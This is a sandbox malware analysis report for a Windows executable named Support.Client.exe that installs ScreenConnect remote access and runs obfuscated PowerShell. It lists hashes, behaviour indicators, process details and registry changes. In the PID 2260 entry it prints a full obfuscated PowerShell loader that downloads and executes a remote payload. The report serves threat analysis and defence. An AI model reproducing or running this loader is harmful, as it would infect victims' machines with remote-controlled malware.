download:

/Bin/Support.Client.exe

Full analysis: https://app.any.run/tasks/cedf1cb8-4fa0-480c-bf09-0a848ce7bb75
Verdict: Malicious activity
Analysis date: November 22, 2024, 02:41:16
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
remote
screenconnect
gumen
opendir
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

4880859A2C9B435D099872AE8C1441A1

SHA1:

1169D35C13F132E0CDD33A37475892B5781CB36F

SHA256:

F304FD8FFCEDC0B6BDD03DD8B1DF876A4A9886AF2635BE4F63354A5BA4E53125

SSDEEP:

1536:ohNeDLHPUVkKo2cgigKIhTnH2QjCdqQsWQcdUkBbfq7NK:vDLHcVkKo2cZgKIhTH2U+lU2bfq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • GUMEN has been detected

      • powershell.exe (PID: 7016)
      • powershell.exe (PID: 6284)
      • powershell.exe (PID: 6552)
      • powershell.exe (PID: 6592)
      • powershell.exe (PID: 7104)
      • powershell.exe (PID: 6948)
      • powershell.exe (PID: 7116)
      • powershell.exe (PID: 2260)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7016)

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 6644)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 3856)

    • Checks Windows Trust Settings

      • dfsvc.exe (PID: 3856)

    • Adds/modifies Windows certificates

      • Support.Client.exe (PID: 4740)

    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 3856)

    • Executes as Windows Service

      • ScreenConnect.ClientService.exe (PID: 6644)

    • Starts CMD.EXE for commands execution

      • ScreenConnect.ClientService.exe (PID: 6644)
      • msiexec.exe (PID: 5124)
      • msiexec.exe (PID: 6320)

    • Executing commands from ".cmd" file

      • ScreenConnect.ClientService.exe (PID: 6644)
      • msiexec.exe (PID: 5124)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6976)
      • wscript.exe (PID: 828)
      • wscript.exe (PID: 6116)
      • wscript.exe (PID: 6796)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 6976)

    • The process executes VB scripts

      • ScreenConnect.WindowsClient.exe (PID: 5372)
      • ScreenConnect.WindowsClient.exe (PID: 5752)
      • ScreenConnect.WindowsClient.exe (PID: 6600)
      • msiexec.exe (PID: 6320)

    • Application launched itself

      • ScreenConnect.WindowsClient.exe (PID: 6720)

    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 3856)

    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 6644)

    • Connects to unusual port

      • ScreenConnect.ClientService.exe (PID: 6644)

    • Executes application which crashes

      • Support.Client.exe (PID: 4740)
      • msiexec.exe (PID: 5124)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 5496)
      • cmd.exe (PID: 5548)

  • INFO

    • Checks supported languages

      • Support.Client.exe (PID: 4740)
      • dfsvc.exe (PID: 3856)

    • Reads the machine GUID from the registry

      • Support.Client.exe (PID: 4740)
      • dfsvc.exe (PID: 3856)

    • Checks proxy server information

      • dfsvc.exe (PID: 3856)

    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 3856)

    • The process uses the downloaded file

      • dfsvc.exe (PID: 3856)

    • Disables trace logs

      • dfsvc.exe (PID: 3856)

    • Reads the software policy settings

      • dfsvc.exe (PID: 3856)

    • Sends debugging messages

      • dfsvc.exe (PID: 3856)

    • Create files in a temporary directory

      • dfsvc.exe (PID: 3856)

    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 3856)

    • Manual execution by a user

      • powershell.exe (PID: 6284)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 7116)
      • powershell.exe (PID: 7104)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 828)
      • wscript.exe (PID: 6116)
      • wscript.exe (PID: 6796)

    • Reads the computer name

      • dfsvc.exe (PID: 3856)
      • Support.Client.exe (PID: 4740)

    • Reads Environment values

      • dfsvc.exe (PID: 3856)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:10:28 17:41:07+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.39
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x1489
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
181
Monitored processes
48
Malicious processes
10
Suspicious processes
6

Behavior graph

Click at the process to see the details
start support.client.exe dfsvc.exe svchost.exe screenconnect.windowsclient.exe no specs screenconnect.clientservice.exe #SCREENCONNECT screenconnect.clientservice.exe screenconnect.windowsclient.exe no specs screenconnect.windowsclient.exe no specs conhost.exe no specs cmd.exe no specs #GUMEN powershell.exe conhost.exe no specs screenconnect.windowsclient.exe no specs wscript.exe no specs screenconnect.windowsclient.exe no specs wscript.exe no specs screenconnect.windowsclient.exe no specs wscript.exe no specs #GUMEN powershell.exe conhost.exe no specs #GUMEN powershell.exe conhost.exe no specs #GUMEN powershell.exe no specs conhost.exe no specs werfault.exe #GUMEN powershell.exe no specs conhost.exe no specs #GUMEN powershell.exe no specs conhost.exe no specs #GUMEN powershell.exe no specs conhost.exe no specs #GUMEN powershell.exe no specs conhost.exe no specs msiexec.exe textinputhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs reg.exe no specs werfault.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
188\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
828"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs" C:\Windows\System32\wscript.exeScreenConnect.WindowsClient.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1588C:\WINDOWS\SysWOW64\WerFault.exe -u -p 4740 -s 912C:\Windows\SysWOW64\WerFault.exe
Support.Client.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
1732\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2260"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sulciform Sheephead Datovekslen Aliped #><#Unfulfilled Tibbu Domptr Aftereye Blizz #>$Hydropolyp='Stempellovenes';function Matranee($Pseudocyclosis){If ($host.DebuggerEnabled) {$Mineraloliernes=4} for ($Phenanthrene=$Mineraloliernes;;$Phenanthrene+=5){if(!$Pseudocyclosis[$Phenanthrene]) { break }$Quods+=$Pseudocyclosis[$Phenanthrene]}$Quods}function Oratoriske($jennifers){ .($Fugtigvarmes) ($jennifers)}$Sortermulighedens=Matranee 'PerinMisfE pliTSt.l.overWFotoeordsBVe,ec.esoLVirkiThisEOutbnHomoT';$Svinget=Matranee 'StedM.agroK ntzSpooiZayil TollButta.ata/';$Propupa=Matranee 'NotaTSt fl FinsAfst1Spad2';$Reactivations220='suit[F.ydnPen,e FoltNor,. FilSFlagEPotsrBevgVEs.diRetrc SleE RespSchoORatii G.on SkitTikmMPizeaNonpNSupea hrgBlueeUndeRdann]pseu:Tran:negeSVaa ePhrec De UForsrShipiVietT Te yTraspMaanR Pr,oPinuT.ondO .ulCEnkeOElveLTown=H rs$HoroP .orRP,ckOVidrPAnglUF.rrp artA';$Svinget+=Matranee 'Mea 5Adha.Gen.0 el Livs(NairWForpiJenhnUn ad VisoEstrwSupesArti Fe eNRampTGrie Disc1Udsl0Dksk.Jo f0Fixe; Rea DueW.egliHindnAfsk6 Vis4Brmm; S n D.ax Ls,6Best4U ex; Gyn MigrrAfdav Byb:Om a1Soci3Part1Opiu.Ma a0Dag )Rhap L ngGfineeSkolc ailkHexaoCo,d/Tena2 llo0Skov1Shak0Pi,c0S up1Inci0Kons1 rse JvniF Snai inarSquie potfOutdoBofoxF du/Slyn1.isc3Au t1 Sel.Udda0';$vedhnget=Matranee ' MilUe poSr,maEMundRMor.- E sABr pGEtr,e Paan HalT';$Yephede=Matranee 'Rillhfilot psptrefepForss St,:mili/Bioc/ brnfM toi anolOrgaePhotdAfsln Sem. SkaeWontuPerg/ istlAutomStorjInt,MMimb1PuppIIl.otC dbiPlusFDirtCPaavHkarrjWitcYFo,fAIns 4Ac iJFoneNInapRO erBAbutYAperBReit3Fleh4kbst/Fagov,undiDefieUncot PrenStana Se mmisv.Galat Milt Kphf';$Kapitulant=Matranee 'Cusc>';$Fugtigvarmes=Matranee 'F,lmiPeixESuk x';$Demotes='Duperede';$Natvgterstat='\Landbrugslovenes201.spr';Oratoriske (Matranee 'Caus$ TragAldeLSys oAsseblyseaYderLDele: ParFRyaeo,eksRw rcl K lyOraiS.otoTBe ye lanl igasS.igE K nsOve SVindy FloGFernt ,je= Ben$MaitE S.rnTic vNett: ahaForbpK biPTrskDPe,fAEl qtFe tASile+Bi.e$Kli N Plea FlotNonrvEulaGCrimt An EKak,rSvarsTragtSat.ANuclT');Oratoriske (Matranee 'Land$TrusGUdl.lAktiO goab StaA ftelPhot:KkkegSeedUForlMLubrmSor I SubH HonJ mi.uBerulWhipE U st SdeSInfe=El,k$S.miYAchrEDidePkabiHDdsdE Co.dReane hav.kuliSB.odP AstLu.deI .ontPri,(Magt$,ociKenqua eplP AffIImpuTscisu Su.lCon ABla NO tiTErst)');Oratoriske (Matranee $Reactivations220);$Yephede=$Gummihjulets[0];$Prepender=(Matranee 'F,st$CeleGKlevLNat,oFng B,ntiAHec.LD ce:PseufGnosiBrugn KriiC traEftelUnde=gr.pNRus,e forWGrov- AfkO ElaBTareJSlineVirkcBerrtCons PentsenclYEmicsCowltMaroEMassmDyst.Bede$EncuSInkaolactrConctUdtrE Ap rBagsMIncoU F.rL kooIFamiGSvunhB tie Ud DEnameBag nfo kS');Oratoriske ($Prepender);Oratoriske (Matranee ' Fre$Ska,FVenti ygnnDom,i Mugahyl.l O e. UndH atheAfruaS mfd De eAfslrBrudsdiso[Cre $skrdvServeblo dKapehInt nSubcgFrade EpitWere] Ker=Stib$ fsvSSkolvBe eiQuidnA prgGeneeSl,tt');$Downsteepy=Matranee ' Pol$RecaFWar i Subnw,iniBenzaPhonlKrys. GjoD,elgoBar w,enonBr llVandoParaaC rkds rvFMakuiAngulD ese A t(Nonh$KoksY emaeFarmpOverhInfieInfldF ale.van, pec$U.dePInd.rAssaoelengOverr R naServmDomss SlayDelfs TimtAcceeDd imOutseTjrnrCrysnInsteKontsWass)';$Programsystemernes=$Forlystelsessygt;Oratoriske (Matranee ' .ru$Swi gBenaLAld.o.kieb PriaMisclRedi:DyresLikvAPhylM SigLHy oiFo uVOlavS ttef Appo ProRStadh,ondoGiggl k nDep,ie ca.NDredEAdmiSFa e=Snea(Ind TTvrmEdelpsAport bro-TriupDig A.yttT solHPlad Br,g$ArsePUpasRRe poFul GPer ROpgaABj gMtir SInt YBy,dS Tr tPredESjokm LunEOutsrHol nOptieNongsTus )');while (!$Samlivsforholdenes) {Oratoriske (Matranee 'Goth$Non.gBorglSammoFeltbCi.uaF lolChap:KommHHenryO.erpHelveKonsr C,no eksx Logy enogHjere ftenAp liUdvisBudgeFrum=Slud$NordPIronh,hrie,ectnGkkeaUndenPra,tDoorhKu irMedie Udsn mageFabunP aip P.euNo.etH sss LortBroanS kkiHjo.n B,agSkrys') ;Oratoriske $Downsteepy;Oratoriske (Matranee 'AcidSFoldtFalla NyhrIn,etRefr-HalvSReirlPs,kem trE strpKrel Rhyn4');Oratoriske (Matranee 'Basi$ EmaGVaanlReveo,xciBEvanaAbo LPai.:V ndS AbeAStteMVoldl amfIboolvSha.ST pef depop.osRPuckHSubaoPerflDuodd armEDefiN Aa,eSalgSHenr=Uni.(FeritFgteeHospSsikkt sla- holPAcriAUdbatSwi hAn,u Need$krlip si RDaglOKalfg anRBibeaCaecm GassEremy PlesPu,kT rdeECadmM ypledommRPlannRes e SkeS yth)') ;Oratoriske (Matranee ' Hyp$SkrlG Begl SkuOGranBjoula entLArka:Skuefg nkASkjorKratVK kke skrLPatrAHyd D,andehje RAsa NA.skE Und=sv m$Melog OpbLAfs.Om.taBCafaAAlmel Re :S inUAi fD FinRUdtoE CymdTorgE inLImpisS ineOri rUndenUig,EThanSFors+Eska+Pa,e%Cent$ KnuGmyloU O eM ,alMOverIConcHChi JHoldUAbr.LforsEblanTTanksFot,. SelCMultOElituAmernNonct') ;$Yephede=$Gummihjulets[$Farveladerne]}$Annekteret42=299776;$Tentorial=31265;Oratoriske (Matranee ' Pan$Ecceg Br lAnkeoanliB M lAE islGuts:StikSFardmReplaInteA pheSMul KnonrO Me,VG anePaganO,blESustSBol. Su,=Unde Vi GSku.EPlayT Unp-O,bic rroUnmenNe sT AbaeB,azNT.aaT Plo Eje $ C.mPUddaR RatoOctegBdrmRDaarAFo,smBucosFaluYFoyaSFristLdgoe HypML geEMindrDsn NEmbuE ejs');Oratoriske (Matranee ' Ove$ HjegOst lV lko DvabSelvaEjstlhet : UndMEkspaAppes .likTra i,asvn Ca,tUdsviKonddcabb Proj=Shet Mar[Sur.S LgeyPreasVirktSzl.eVandmCard.,rolCSerboTrngn Birv ate Botrrundt,ymn]In e:Pil :BidsFSkinrOpsto premibr BGu daSamasOunceCa,t6Tea 4Sku SSylltNonir ZiriTelen.ajogInda( S,u$ iriSDopimRemia.reeaBenzs Lisk UndoCostv V seSkrinOdiseSpidsi it)');Oratoriske (Matranee 'Fuks$SeptgCantlProvO anbGramARedeL ong:PhrademboI AhaA I tPHer,EL euRho eS Ind1,tal4K ea2Niff Sier=B ck Sha[ AvnsKrn yPrevSS lvTRn eERataMS,te.letuTIndkeRuskxChrotCabi.TeraE IsoNUrt,CGenboB eddDownIToriNSup gWarm]Trim: Sou:Hem aFor,sHaa cProtiUdv,i im.Str,G.lasENegrTEf,eSAv rTKalmRKongiE panPudeg Ka.(Deri$M,liM,ereABortsu fekMomsi HydnDweetWoozI erud dup)');Oratoriske (Matranee 'Moon$Indvg TorlSan oMagnbPillASveslStat:Blo.vAlcaEK lllOs uaLoxotLatheMarqDY te=Berk$ V jDOveriFor a TerpIn,eeTetrr P,lS U,b1 Reg4Unal2 Hyd.BogtSFor UPladBPeptSMasstForeRVindiIn pNQuirgAfre( Fac$Sky,AS ccNbalanTidseSp.tKApp,TContEQuinrTrykeCacotbrug4Ina.2Demi,Vehe$Tankt B,leUvitn.mboTAccooEastREupni OutAhurtLOm l)');Oratoriske $Velated;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2420"C:\WINDOWS\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mcaC:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Version:
123.26505.0.0
2548\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
2928"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
3632\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Total events
40 631
Read events
40 416
Write events
185
Delete events
30

Modification events

(PID) Process:(4740) Support.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(4740) Support.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(4740) Support.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process:(4740) Support.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation:writeName:Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
820B1NQP1N0HHPBB1Y27AR7N
(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
820B1NQP1N0HHPBB1Y27AR7N
(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
5LQ1YK6QPW3V9QQCJ1KYZ9CA
